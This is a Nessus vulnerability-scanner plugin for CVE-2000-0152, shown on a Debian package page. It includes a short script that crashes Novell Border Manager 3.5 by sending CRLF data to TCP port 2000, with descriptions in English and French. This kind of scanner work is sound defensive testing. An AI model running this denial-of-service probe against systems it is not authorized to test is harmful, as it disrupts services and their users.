File: novell_border_manager.nasl

package info (click to toggle)
nessus-plugins 1.0.10-2
  • links: PTS
  • area: main
  • in suites: woody
  • size: 4,924 kB
  • ctags: 408
  • sloc: sh: 7,838; ansic: 3,415; makefile: 233
file content (96 lines) | stat: -rw-r--r-- 2,688 bytes parent folder | download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10163);
 script_cve_id("CVE-2000-0152");
 name["english"] = "Novell Border Manager";
 name["francais"] = "Novell Border Manager";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
The port 2000 is open, and Novell Border Manager
*might* be listening on it.

There is a denial of service attack that allow
an intruder to make a Novell Border Manager 3.5 slowly
die.

If you see an error message on this computer telling 
you 'Short Term Memory Allocator is out of Memory'
then you are vulnerable to this attack.

An attacker may use this flaw to prevent this
service from doing its job and to prevent the 
user of this station to work on it.

Solution : contact Novell and ask for a patch or
filter incoming TCP connections to port 2000

Risk factor : Serious
Warning : if there is no error message whatsoever on this
computer, then this is a false positive";


 desc["francais"] = "
Le port 2000 est ouvert, et il *se peut* que
Novell Border Manager 3.5 soit en coute derrire.

Il existe une attaque par dni de service qui permet 
 un intrus de tuer lentement celui-ci.

Si vous voyez un message d'erreur sur ce systme, parlant
de mmoire n'ayant pu etre alloue, alors il est vulnrable
 cette attaque.

Un pirate peut utiliser ce problme pour non seulement
empecher ce service de fonctionner correctement, mais aussi
pour empecher l'utilisateur de ce systme de ce servir de
celui-ci.


Solution : contactez Novell et demandez un patch ou filtrez
les connections entrantes vers le port tcp 2000
Facteur de risque : Srieux
Attention : s'il n'y a pas de message d'erreur sur la machine en
question, alors ce warning est une fausse alerte";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes the remote Border Manager";
 summary["francais"] = "Plante BorderManager";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);

 script_require_ports(2000);
 exit(0);
}

#
# The script code starts here
#


if(get_port_state(2000))
{
 soc = open_sock_tcp(2000);
 if(soc)
 {
  msg = crap(data:"\r\n", length:20);
  send(socket:soc, data:msg);
  close(soc);
  security_hole(2000); 
 }
}